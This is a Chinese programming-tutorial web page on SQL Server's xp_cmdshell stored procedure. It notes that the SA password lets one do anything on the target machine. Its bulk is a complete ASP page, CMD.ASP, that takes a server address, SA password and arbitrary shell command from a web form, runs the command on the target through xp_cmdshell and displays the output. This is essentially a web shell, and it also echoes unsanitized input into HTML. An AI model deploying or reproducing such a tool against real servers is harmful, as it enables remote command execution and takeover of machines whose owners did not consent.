您的位置:首页编程技术文章内容

SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

浏览:36日期:2023-07-27

XP_CMDSHELL存储过程是执行本机的CMD命令,要求系统登陆有SA权限,也就是说如果获得SQLSERVER的SA命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。下面是我写的一个简单的应用页面(ASP),代码如下。CMD.ASP<%@LANGUAGE='VBSCRIPT' CODEPAGE='936'%><!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN' 'http://www.w3.org/TR/html4/loose.dtd'><html><head><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><title>SQLSERVER_XP_CMDSHELL实例_魔术师·刘</title><style type='text/css'><!--body{font-size:13px;line-height:20px;width:760;SCROLLBAR-FACE-COLOR: #2896e1;SCROLLBAR-SHADOW-COLOR: #6cb4d8;SCROLLBAR-ARROW-COLOR: #f0f0f0;SCROLLBAR-DARKSHADOW-COLOR: #2896e1;SCROLLBAR-BASE-COLOR: #2896e1;background-image: url(images/bg.gif);}.LBR{border-top:0px solid #336699;border-left:1px solid #336699;border-right:1px solid #336699;border-bottom:1px solid #336699;}.all_h {border: 1px solid #336699;}.input {border: 1px solid #336699;background-color:#ECEAFD;}.LB{border-top:0px solid #336699;border-left:1px solid #336699;border-right:0px solid #336699;border-bottom:1px solid #336699;}.N1 {font-weight:bold;color:#339933;font-size:13px;}.N2 {font-weight:bold;color:#ff0000;font-size:13px;}--></style></head>

<body>

<%if request('cmd')<>'' then%><table width=400; border=0 align=center cellpadding=5 cellspacing=0> <tr align=center> <td height=30; class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL请求结果</span></td> </tr> <%

dim connstr,conn,rs,iConnStr='Provider=sqloledb.1;persist security info=false;server='&request('server')&';uid=sa;pwd='&request('pwd')&';database=master''ConnStr='Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master'set conn=Server.CreateObject('ADODB.Connection')conn.open Connstrset rs=server.CreateObject('ADODB.Recordset')set rs=conn.execute('xp_cmdshell ''&replace(replace(request('cmd'),''',''''),chr(34),'''')&''')i=0while not rs.eofif not isnull(rs(0)) thenif i mod 2 =0 thenresponse.Write '<tr><td class=''LBR'' bgcolor=''#DEF3FF''>'&rs(0)&'</td></tr>'elseresponse.Write '<tr><td class=''LBR''>'&rs(0)&'</td></tr>'end ifi=i+1end ifrs.movenextwendrs.closeset rs=nothingconn.closeset conn=nothing%></table><%end if%><form name='form1' method='post' action=''> <table width=400; border=0 align=center cellpadding=5 cellspacing=0> <tr align=center> <td height=30 colspan=2; class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL实例</span></td> </tr> <tr align=center bgcolor=#DEF3FF> <td width=26% class=LB><strong>服务器</strong></td> <td width=74% class=LBR><div align='left'> <input name='Server' type='text' size='20' value='<%=request('Server')%>'> </div></td> </tr> <tr align=center > <tdclass=LB><b>SA密码 </b></td> <tdclass=LBR><div align='left'><span class=N1> <input name='PWD' type='text' size='20' value='<%=request('PWD')%>'> </span></div></td> </tr> <tr align=center bgcolor=#DEF3FF> <td width=26% class=LB><strong>CMD命令</strong></td> <td width=74% class=LBR><div align='left'> <input name='CMD' type='text' size='20' value='<%=request('CMD')%>'> </div></td> </tr> <tr align=center > <td colspan='2'class=LBR><div align='center'><b> </b> <input type='submit' name='Submit' value='; 提交Command命令; ' class='input'> </div></td> </tr> </table></form></body></html>

上一条:精妙sql语句集合下一条:特殊sql语句及优化原则
相关文章:
1. C语言强制类型转换怎么做?2. 教你如何用Eclipse创建一个Maven项目3. 聊聊在Servlet中怎么上传文件4. 详解大数据处理引擎Flink内存管理5. 分析ABA问题的本质及其解决办法6. Flink支持哪些数据类型?7. 浅谈ArrayList和LinkedList到底谁更快8. 浅析NIO系列之TCP9. 小白必看toString(),String.valueOf,(String)强转10. 详解ArrayList的扩容机制
热门推荐

网公网安备:皖ICP备2020019022号-8 Copyright ¢ 2020-2025 Powered by V1.8 All Rights Reserved 技术支持:乐呵呵网

声明:本站所有资源以学习为主